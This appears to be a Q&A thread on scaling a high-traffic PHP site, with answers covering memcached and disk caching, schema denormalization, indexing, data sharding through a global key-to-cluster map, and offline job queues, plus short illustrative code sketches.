* You probably don't want to break your database up at this point. If you do find that one database isn't cutting it, there are several techniques to scale up, depending on your app. Replicating to additional servers typically works well if you have more reads than writes. Sharding is a technique to split your data over many machines.

# Caching

* You probably don't want to cache in your database. The database is typically your bottleneck, so adding more IO's to it is typically a bad thing. There are several PHP caches out there that accomplish similar things like [APC](http://ca.php.net/apc) and Zend.
* Measure your system with caching on and off. I bet your cache is heavier than serving the pages straight.
* If it takes a long time to build your comments and article data from the db, integrate [memcache](http://www.danga.com/memcached/) into your system. You can cache the query results and store them in a memcached instance. It's important to remember that retrieving the data from memcache must be faster than assembling it from the database to see any benefit.
* If your articles aren't dynamic, or you have simple dynamic changes after they're generated, consider writing out html or php to the disk. You could have an index.php page that looks on disk for the article; if it's there, it streams it to the client. If it isn't, it generates the article, writes it to the disk and sends it to the client. Deleting files from the disk would cause pages to be re-written. If a comment is added to an article, delete the cached copy -- it would be regenerated.
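The cache-aside flow described above (check the cache, rebuild on a miss, store the result with a TTL) can be sketched in a few lines. This is Python purely for illustration, with a plain dict standing in for the memcached client; all names are ours:

```python
import time

# Stand-in for a memcached client: key -> (expires_at, value).
cache = {}
TTL = 60  # seconds

def expensive_db_query(article_id):
    # Placeholder for the real database work.
    return {"id": article_id, "comments": ["first!"]}

def get_article(article_id):
    key = "article:%d" % article_id
    hit = cache.get(key)
    if hit is not None and hit[0] > time.time():
        return hit[1]                            # cache hit: no DB work
    value = expensive_db_query(article_id)       # cache miss: rebuild...
    cache[key] = (time.time() + TTL, value)      # ...and store for next time
    return value

print(get_article(7)["comments"])  # ['first!']
```

The point of the measurement advice above still applies: this only helps if `expensive_db_query` really is slower than the cache round-trip.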
I'm a lead developer on a site with over 15M users. We have had very few scaling problems because we planned for it EARLY and scaled thoughtfully. Here are some of the strategies I can suggest from my experience.

**SCHEMA**

First off, denormalize your schemas. This means that rather than having multiple relational tables, you should instead opt to have one big table. In general, joins are a waste of precious DB resources because doing multiple prepares and collation burns disk I/O's. Avoid them when you can.

The trade-off here is that you will be storing/pulling redundant data, but this is acceptable because data and intra-cage bandwidth is very cheap (bigger disks) whereas multiple prepare I/O's are orders of magnitude more expensive (more servers).

**INDEXING**

Make sure that your queries utilize at least one index. Beware though, that indexes will cost you if you write or update frequently. There are some experimental tricks to avoid this.

You can try adding additional columns that aren't indexed which run parallel to your columns that are indexed. Then you can have an offline process that writes the non-indexed columns over the indexed columns in batches. This way, you can better control when mySQL will need to recompute the index.

Avoid computed queries like the plague. If you must compute a query, try to do this once at write time.

**CACHING**

I highly recommend Memcached. It has been proven by the biggest players on the PHP stack (Facebook) and is very flexible. There are two methods of doing this: one is caching in your DB layer, the other is caching in your business logic layer.

The DB layer option would require caching the result of queries retrieved from the DB. You can hash your SQL query using md5() and use that as a lookup key before going to the database. The upside to this is that it is pretty easy to implement. The downside (depending on implementation) is that you lose flexibility because you're treating all caching the same with regard to cache expiration.

In the shop I work in, we use business layer caching, which means each concrete class in our system controls its own caching schema and cache timeouts. This has worked pretty well for us, but be aware that items retrieved from DB may not be the same as items from cache, so you will have to update cache and DB together.

**DATA SHARDING**

Replication only gets you so far. Sooner than you expect, your writes will become a bottleneck. To compensate, make sure to support data sharding as early as possible. You will likely want to shoot yourself later if you don't.

It is pretty simple to implement. Basically, you want to separate the key authority from the data storage. Use a global DB to store a mapping between primary keys and cluster ids. You query this mapping to get a cluster, and then query the cluster to get the data. You can cache the hell out of this lookup operation, which will make it a negligible operation.

The downside to this is that it may be difficult to piece together data from multiple shards. But, you can engineer your way around that as well.

**OFFLINE PROCESSING**

Don't make the user wait for your backend if they don't have to. Build a job queue and move any processing that you can offline, doing it separate from the user's request.
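The two-step shard lookup described above (key authority first, data storage second) fits in a few lines. Python is used purely for illustration here; the dicts stand in for the global mapping DB and the per-cluster databases, and all names are made up:

```python
# Step 1 source: global map from entity id -> cluster id.
# In production this is a small, heavily cached DB table.
GLOBAL_MAP = {101: "cluster-a", 102: "cluster-b"}

# Step 2 source: per-cluster data stores keyed by entity id.
CLUSTERS = {
    "cluster-a": {101: {"name": "alice"}},
    "cluster-b": {102: {"name": "bob"}},
}

def fetch(entity_id):
    cluster = GLOBAL_MAP[entity_id]      # step 1: key authority (cacheable)
    return CLUSTERS[cluster][entity_id]  # step 2: data storage on that shard

print(fetch(102)["name"])  # bob
```

Because the first lookup is tiny and rarely changes, it is exactly the kind of thing the caching section above says to cache aggressively.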
Tactics for using PHP in a high-load site
[ "", "php", "performance", "high-load", "" ]